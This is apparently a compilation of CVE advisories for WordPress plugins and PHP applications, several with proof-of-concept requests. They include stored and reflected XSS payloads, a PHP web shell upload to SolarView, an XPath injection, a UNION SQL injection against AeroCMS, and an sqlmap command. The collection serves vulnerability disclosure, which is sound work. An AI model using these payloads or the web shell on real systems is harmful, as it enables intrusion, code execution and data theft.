The Ultimate Member plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.5.0 via the get_option_value_from_callback function that accepts user supplied input and passes it through call_user_func(). This makes it possible for authenticated attackers, with administrative capabilities, to execute code on the server.

CVE-2022-3383: Changeset 2805393 for ultimate-member – WordPress Plugin Repository

The Photospace Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings parameters saved via the update() function in versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2022-3991: photospace.php in photospace/trunk – WordPress Plugin Repository

The Simple:Press plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 6.8 via the 'file' parameter which can be manipulated during user avatar deletion. This makes it possible with attackers, with minimal permissions such as a subscriber, to supply paths to arbitrary files on the server that will subsequently be deleted. This can be used to delete the wp-config.php file that can allow an attacker to configure the site and achieve remote code execution.

98         # 1: strip mb4 chars if unsuppofrted  98        # 1: strip mb4 chars if unsupported

599         $allowedforumtags      = array('address' => array('class' => true), 'a' => array('class' => true, 'href' => true, 'id' => true, 'title' => true, 'rel' => true, 'rev' => true, 'name' => true, 'target' => true, 'style' => true), 'abbr' => array('class' => true, 'title' => true), 'acronym' => array('title' => true, 'class' => true), 'article' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'aside' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'audio' => array('autoplay' => true, 'class' => true, 'controls' => true, 'id' => true, 'loop' => true, 'muted' => true, 'poster' => true, 'preload' => true, 'src' => true, 'style' => true), 'b' => array('class' => true), 'big' => array('class' => true), 'blockquote' => array('id' => true, 'cite' => true, 'class' => true, 'lang' => true, 'xml:lang' => true, 'style' => true), 'br' => array('class' => true), 'caption' => array('align' => true, 'class' => true), 'cite' => array('class' => true, 'dir' => true, 'lang' => true, 'title' => true), 'code' => array('class' => true, 'style' => true), 'dd' => array('class' => true), 'del' => array('datetime' => true), 'details' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'open' => true, 'style' => true, 'xml:lang' => true), 'div' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'dl' => array('class' => true), 'dt' => array('class' => true), 'em' => array('class' => true), 'embed' => array('height' => true, 'name' => true, 'pallette' => true, 'src' => true, 'type' => true, 'width' => true), 'figure' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'figcaption' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'font' => array('color' => true, 'face' => true, 'size' => true), 'footer' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'header' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'hgroup' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'h1' => array('align' => true, 'class' => true, 'id' => true, 'style' => true), 'h2' => array('align' => true, 'class' => true, 'id' => true, 'style' => true), 'h3' => array('align' => true, 'class' => true, 'id' => true, 'style' => true), 'h4' => array('align' => true, 'class' => true, 'id' => true, 'style' => true), 'h5' => array('align' => true, 'class' => true, 'id' => true, 'style' => true), 'h6' => array('align' => true, 'class' => true, 'id' => true, 'style' => true), 'hr' => array('align' => true, 'class' => true, 'noshade' => true, 'size' => true, 'width' => true), 'i' => array('class' => true), 'img' => array('alt' => true, 'title' => true, 'align' => true, 'border' => true, 'class' => true, 'height' => true, 'hspace' => true, 'longdesc' => true, 'vspace' => true, 'src' => true, 'style' => true, 'width' => true, 'data-upload' => true, 'data-width' => true, 'data-height' => true), 'ins' => array('datetime' => true, 'cite' => true), 'kbd' => array('class' => true), 'label' => array('for' => true), 'legend' => array('align' => true), 'li' => array('align' => true, 'class' => true, 'id' => true, 'style' => true), 'menu' => array('class' => true, 'style' => true, 'type' => true), 'nav' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'object' => array('classid' => true, 'codebase' => true, 'codetype' => true, 'data' => true, 'declare' => true, 'height' => true, 'name' => true, 'param' => true, 'standby' => true, 'type' => true, 'usemap' => true, 'width' => true), 'param' => array('id' => true, 'name' => true, 'type' => true, 'value' => true, 'valuetype' => true), 'p' => array('class' => true, 'align' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'pre' => array('class' => true, 'style' => true, 'width' => true), 'q' => array('cite' => true), 's' => array('class' => true), 'section' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'small' => array('class' => true), 'source' => array('class' => true, 'id' => true, 'media' => true, 'src' => true, 'style' => true, 'type' => true), 'span' => array('class' => true, 'dir' => true, 'align' => true, 'lang' => true, 'style' => true, 'title' => true, 'xml:lang' => true, 'id' => true), 'strike' => array('class' => true), 'strong' => array('class' => true), 'sub' => array('class' => true), 'summary' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true), 'sup' => array('class' => true), 'table' => array('align' => true, 'bgcolor' => true, 'border' => true, 'cellpadding' => true, 'cellspacing' => true, 'class' => true, 'dir' => true, 'id' => true, 'rules' => true, 'style' => true, 'summary' => true, 'width' => true), 'tbody' => array('align' => true, 'char' => true, 'charoff' => true, 'valign' => true), 'td' => array('abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'class' => true, 'colspan' => true, 'dir' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'style' => true, 'valign' => true, 'width' => true), 'tfoot' => array('align' => true, 'char' => true, 'class' => true, 'charoff' => true, 'valign' => true), 'th' => array('abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'class' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true), 'thead' => array('align' => true, 'char' => true, 'charoff' => true, 'class' => true, 'valign' => true), 'title' => array('class' => true), 'tr' => array('align' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'class' => true, 'style' => true, 'valign' => true), 'tt' => array('class' => true), 'u' => array('class' => true), 'ul' => array('class' => true, 'style' => true, 'type' => true), 'ol' => array('class' => true, 'start' => true, 'style' => true, 'type' => true), 'var' => array('class' => true), 'video' => array('autoplay' => true, 'class' => true, 'controls' => true, 'height' => true, 'id' => true, 'loop' => true, 'muted' => true, 'poster' => true, 'preload' => true, 'src' => true, 'style' => true, 'width' => true));  599        $allowedforumtags      = array('address' => array('class' => true),  600                                        'a' => array('class' => true, 'href' => true, 'id' => true, 'title' => true, 'rel' => true, 'rev' => true, 'name' => true, 'target' => true, 'style' => true),  601                                        'abbr' => array('class' => true, 'title' => true),  602                                        'acronym' => array('title' => true, 'class' => true),  603                                        'article' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  604                                        'aside' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  605                                        'audio' => array('autoplay' => true, 'class' => true, 'controls' => true, 'id' => true, 'loop' => true, 'muted' => true, 'poster' => true, 'preload' => true, 'src' => true, 'style' => true),  606                                        'b' => array('class' => true),  607                                        'big' => array('class' => true),  608                                        'blockquote' => array('id' => true, 'cite' => true, 'class' => true, 'lang' => true, 'xml:lang' => true, 'style' => true),  609                                        'br' => array('class' => true),  610                                        'caption' => array('align' => true, 'class' => true),  611                                        'cite' => array('class' => true, 'dir' => true, 'lang' => true, 'title' => true),  612                                        'code' => array('class' => true, 'style' => true), 'dd' => array('class' => true),  613                                        'del' => array('datetime' => true),  614                                        'details' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'open' => true, 'style' => true, 'xml:lang' => true),  615                                        'div' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  616                                        'dl' => array('class' => true),  617                                        'dt' => array('class' => true),  618                                        'em' => array('class' => true),                                           619                                        'figure' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  620                                        'figcaption' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  621                                        'font' => array('color' => true, 'face' => true, 'size' => true),  622                                        'footer' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  623                                        'header' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  624                                        'hgroup' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  625                                        'h1' => array('align' => true, 'class' => true, 'id' => true, 'style' => true),  626                                        'h2' => array('align' => true, 'class' => true, 'id' => true, 'style' => true),  627                                        'h3' => array('align' => true, 'class' => true, 'id' => true, 'style' => true),  628                                        'h4' => array('align' => true, 'class' => true, 'id' => true, 'style' => true),  629                                        'h5' => array('align' => true, 'class' => true, 'id' => true, 'style' => true),  630                                        'h6' => array('align' => true, 'class' => true, 'id' => true, 'style' => true),  631                                        'hr' => array('align' => true, 'class' => true, 'noshade' => true, 'size' => true, 'width' => true),  632                                        'i' => array('class' => true),  633                                        'img' => array('alt' => true, 'title' => true, 'align' => true, 'border' => true, 'class' => true, 'height' => true, 'hspace' => true, 'longdesc' => true, 'vspace' => true, 'src' => true, 'style' => true, 'width' => true, 'data-upload' => true, 'data-width' => true, 'data-height' => true),  634                                        'ins' => array('datetime' => true, 'cite' => true),  635                                        'kbd' => array('class' => true),  636                                        'label' => array('for' => true),  637                                        'legend' => array('align' => true),  638                                        'li' => array('align' => true, 'class' => true, 'id' => true, 'style' => true),  639                                        'menu' => array('class' => true, 'style' => true, 'type' => true),  640                                        'nav' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  641                                        'param' => array('id' => true, 'name' => true, 'type' => true, 'value' => true, 'valuetype' => true),  642                                        'p' => array('class' => true, 'align' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  643                                        'pre' => array('class' => true, 'style' => true, 'width' => true), 'q' => array('cite' => true),  644                                        's' => array('class' => true),  645                                        'section' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  646                                        'small' => array('class' => true),  647                                        'source' => array('class' => true, 'id' => true, 'media' => true, 'src' => true, 'style' => true, 'type' => true),  648                                        'span' => array('class' => true, 'dir' => true, 'align' => true, 'lang' => true, 'style' => true, 'title' => true, 'xml:lang' => true, 'id' => true),  649                                        'strike' => array('class' => true),  650                                        'strong' => array('class' => true),  651                                        'sub' => array('class' => true),  652                                        'summary' => array('align' => true, 'class' => true, 'dir' => true, 'lang' => true, 'style' => true, 'xml:lang' => true),  653                                        'sup' => array('class' => true),  654                                        'table' => array('align' => true, 'bgcolor' => true, 'border' => true, 'cellpadding' => true, 'cellspacing' => true, 'class' => true, 'dir' => true, 'id' => true, 'rules' => true, 'style' => true, 'summary' => true, 'width' => true),  655                                        'tbody' => array('align' => true, 'char' => true, 'charoff' => true, 'valign' => true),  656                                        'td' => array('abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'class' => true, 'colspan' => true, 'dir' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'style' => true, 'valign' => true, 'width' => true),  657                                        'tfoot' => array('align' => true, 'char' => true, 'class' => true, 'charoff' => true, 'valign' => true),  658                                        'th' => array('abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'class' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true),  659                                        'thead' => array('align' => true, 'char' => true, 'charoff' => true, 'class' => true, 'valign' => true),  660                                        'title' => array('class' => true),  661                                        'tr' => array('align' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'class' => true, 'style' => true, 'valign' => true),  662                                        'tt' => array('class' => true),  663                                        'u' => array('class' => true),  664                                        'ul' => array('class' => true, 'style' => true, 'type' => true),  665                                        'ol' => array('class' => true, 'start' => true, 'style' => true, 'type' => true),  666                                        'var' => array('class' => true),  667                                        'video' => array('autoplay' => true, 'class' => true, 'controls' => true, 'height' => true, 'id' => true, 'loop' => true, 'muted' => true, 'poster' => true, 'preload' => true, 'src' => true, 'style' => true, 'width' => true)  668                                    );

CVE-2022-4030: Changeset 2804020 for simplepress – WordPress Plugin Repository

Garage Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /garage/php_action/createBrand.php.

Permalink

Cannot retrieve contributors at this time

**Title: Garage Management System 1.0 Stored Cross-Site Scripting****Author: tpaer****Date: 07.22.2022****Vendor:**

https://www.sourcecodester.com/users/mayurik

**Software:**

https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

#Description： #The Line 10 of createBrand.php sends unvalidated data to a web browser, which can result in the browser executing malicious code

#echo $createBrand->brandName;

#POC:

POST /garage/php\_action/createBrand.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/garage/add-brand.php
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------259114429803
Content-Length: 472
\-----------------------------259114429803
Content-Disposition: form-data; name="currnt\_date"
\-----------------------------259114429803
Content-Disposition: form-data; name="brandName"
hello(><script>alert(/test/)</script>
\-----------------------------259114429803
Content-Disposition: form-data; name="brandStatus"
1
\-----------------------------259114429803
Content-Disposition: form-data; name="create"
\-----------------------------259114429803--

CVE-2022-44279: bug_report/xss1.md at main · Onetpaer/bug_report

SolarView Compact 4.0 and 5.0 is vulnerable to Unrestricted File Upload via a crafted php file.

Permalink

Cannot retrieve contributors at this time

**Unrestricted File Upload vulnerability in SolarView Compact 4.0,5.0****Description**

Unrestricted File Upload vulnerability in SolarView Compact 4.0,5.0 at /Solar\_Image.php can allow attackers to get a Remote Code Execution on the vulnerable host via upload crafted php file.

**POC**

1.  navigate to /Solar\_Image.php
2.  upload any php file and caputre the request
3.  update the userfile and upfilename parameters like this:

    -----------------------------168287165333758025211172961484
    Content-Disposition: form-data; name="userfile"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php echo "Shell";system($_GET['cmd']); ?>
    -----------------------------168287165333758025211172961484
    Content-Disposition: form-data; name="upfilename"
    
    shell.php
    -----------------------------168287165333758025211172961484
    

4.  send the request and navigate to /images/background/shell.php?cmd=ls

CVE-2022-44354: Vulns/Unrestricted File Upload_ SolarView Compact 4.0,5.0.md at main · strik3r0x1/Vulns

SolarView Compact 7.0 is vulnerable to Cross-site Scripting (XSS) via /network_test.php.

**Cross-site Scripting (XSS) in all SolarView Compact v7.00****Description**

Cross-site Scripting (XSS) - Reflected in SolarView Compact v7.0 via crafted POST request to /network\_test.php

**POC**

When someone opens this html file, or we can add it into our website, XSS will execute.

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://{HOST}/network_test.php" method="POST">
          <input type="hidden" name="host" value="127&#46;0&#46;0&#46;1" />
          <input type="hidden" name="command" value="test&apos;&lt;script&gt;alert&#40;'XSS_By_Strik3r'&#41;&lt;&#47;script&gt;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

**Impact**

The consequence of an XSS attack is the same regardless of whether it is stored or reflected (or DOM Based). The difference is in how the payload arrives at the server. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

*   Perform any action within the application that the user can perform.
*   View any information that the user is able to view.
*   Modify any information that the user is able to modify.
*   Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

CVE-2022-44355: Vulns/SolarView Compact XSS up to 7.0.md at main · strik3r0x1/Vulns

Concrete CMS version 9.1.3 suffers from an XPATH injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection## Author: nu11secur1ty## Date: 11.28.2022## Vendor: https://www.concretecms.org/## Software: https://www.concretecms.org/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3## Description:The URL path folder `3` appears to be vulnerable to XPath injection attacks.The test payload 50539478' or 4591=4591-- was submitted in the URLpath folder `3`, and an XPath error message was returned.The attacker can flood with requests the system by using thisvulnerability to untilted he receives the actual paths of the allcontent of this system which content is stored on some internal orexternal server.## STATUS: HIGH Vulnerability[+] Exploits:00:```GETGET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTPHTTP/1.1 500 Internal Server ErrorDate: Mon, 28 Nov 2022 15:32:22 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html;charset=UTF-8Content-Length: 592153<!DOCTYPE html><html>  <head>    <meta charset="utf-8">    <meta name="robots" content="noindex,nofollow"/>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no"/>    <title>Concrete CMS has encountered an issue.</title>    <style>body {  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  color: #131313;  background: #eeeeee;  padding:0;  margin: 0;  max-height: 100%;  text-rendering: optimizeLegibility;}  a {    text-decoration: none;  }.Whoops.container {    position: relative;    z-index: 9999999999;}.panel {    overflow-y: scroll;    height: 100%;    position: fixed;    margin: 0;    left: 0;    top: 0;}.branding {  position: absolute;  top: 10px;  right: 20px;  color: #777777;  font-size: 10px;    z-index: 100;}  .branding a {    color: #e95353;  }header {  color: white;  box-sizing: border-box;  background-color: #2a2a2a;  padding: 35px 40px;  max-height: 180px;  overflow: hidden;  transition: 0.5s;}  header.header-expand {    max-height: 1000px;  }  .exc-title {    margin: 0;    color: #bebebe;    font-size: 14px;  }    .exc-title-primary, .exc-title-secondary {      color: #e95353;    }    .exc-message {      font-size: 20px;      word-wrap: break-word;      margin: 4px 0 0 0;      color: white;    }      .exc-message span {        display: block;      }      .exc-message-empty-notice {        color: #a29d9d;        font-weight: 300;      }.......```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)## Proof and Exploit:[href](https://streamable.com/4f60ka)## Time spent`03:00:00`

Concrete CMS 9.1.3 XPATH Injection

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.

**Step to Reproduct**

*   The search parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The search parameter is passed in the POST mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    "SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'"
    

**POC**

*   Injection Point

    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
    

*   Request

    POST /AeroCMS-0.0.1/search.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163
    Connection: close
    
    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=

CVE-2022-45329: CVE/search_sql_injection.md at master · rdyx0/CVE

Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.

**Vulnerability Explanation:**

Online-shopping-system-advanced was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php

**Affected Component:**

http://\[ip\]/shopping/product.php?p=72

**Payload:**

Parameter: p (GET)  
    Type: UNION query  
    Title: Generic UNION query (NULL) - 8 columns  
    Payload: p=72 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a6271,0x61644f4c796848674f74444476795064457842697a416649624d78546f4152624f78644a77446867,0x7170707071),NULL,NULL,NULL,NULL-- -

**Tested on:**

1.  Online-shopping-system-advanced

https://github.com/PuneethReddyHC/online-shopping-system-advanced

**Steps to attack:**

1.  Go to the mainpage and click on head-phone product.

4\. We’ll found /shopping/product.php?p=72

5.Using sqlmap with our URL by the following the command below:

sqlmap -u "http://\[IP\]/shopping/product.php?p=72" --batch --threads 10 --technique U --dbs

6\. We discovered SQL injection vulnerability via the p parameter.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://github.com/PuneethReddyHC/online-shopping-system-advanced

CVE-2022-42109: Online-shopping-system-advanced — SQL Injection at product.php

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Affected Component:**

http://ip\_address:port/churchcrm/SystemSettings.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Admin” as show in the picture and Click on the “Edit General Settings”

3\. Next, Go to the “System Settings”. click on the “sHeader” input then enter the XSS payload and press the Save Settings button.

4\. After refresh this page The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

Tag

#php